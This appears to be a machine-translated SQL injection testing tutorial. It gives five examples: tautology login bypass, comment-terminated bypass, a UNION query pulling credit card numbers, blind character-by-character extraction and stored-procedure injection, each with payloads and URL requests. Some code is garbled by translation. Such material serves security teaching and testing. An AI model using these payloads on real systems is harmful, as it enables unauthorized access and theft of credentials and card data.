Example1:
SELECT * from users where username= ' $username ' and password= ' $password '
Test data:
$username = 1 ' or ' 1 ' = ' 1
$password =1 ' or ' 1 ' = ' 1
SELECT * from users where username= ' 1 ' or ' 1 ' = ' 1 ' and password= ' 1 ' or ' 1 ' = ' 1 '
If the parameter value is passed to the server by the Get method, the access request is:
Http://www.example.com/index.php?username=1 '%20or%20 ' 1 '%20=%20 ' 1&password=1 '%20or%20 ' 1 '%20=%20 ' 1
The SQL statement is always true and the user name and password are not verified;
Example 2:
SELECT * from the Users where ((username= ' $username ') and (Password=md5 (' $password ')))
Test data:
$username =1 ' or ' 1 ' = ' 1 '))/*
$password = Foo
SELECT * from Users where ((username= ' 1 ' or ' 1 ' = ' 1 '))/* ') and (Password=md5 (' $password ')))
URL Request:
Http://www.example.com/index.php?username=1 '%20or%20 ' 1 '%20=%20 ' 1 '))/*&password=foo
Example 3:
Select Name,phone,address from users where id= $id
Test data:
$id =1 UNION ALL select creditcardnumber,1,1 from creditcartable
Select Name,phone,address from the users where id=1 union ALL select creaditcardnumber,1,1 from creditcartable
Example 4:
Blind SQL injection, such as a URL in which the parameter name is ID, enter a URL request reference:
Http://www.exampe.com/index.php?id=1 '
Assume that the server query statement is:
Select Field1,field2,field3 from users where id= ' $id '
A function that reads a value from a literal character:
SUBSTRING (text,start,length), ASCII (char), Length (text)
Reference the ID as:
$id =1 ' and ASCII (substring (username,1,1)) =97 and ' 1 ' = ' 1
Select Field1,field2,field3 from users where id= ' 1 ' and ASCII (substring (username,1,1)) =97 and ' 1 ' = ' 1
If the database user name the first character ASCII code is 97, can get the truth, continue to look for a character under the name of the user, if not, guess 98, repeatedly judge the legitimate user name;
Example 5:
Stored Procedure Injection
If you use stored procedures improperly, it can cause a certain SQL injection vulnerability.
Create procedure User_login
@username varchar (20),
@password varchar () as Declare @sqlstring varchar (250)
Set @sqlstring = ' '
Select 1 from users
where username= ' [email protected]+ ' and password= ' [email protected]
EXEC (@sqlstring)
Go
Test data:
Anyusername or 1=1 '
Anypassword
If the program does not validate the input, the above statement returns a record in the database
SQL injection common statements {notes}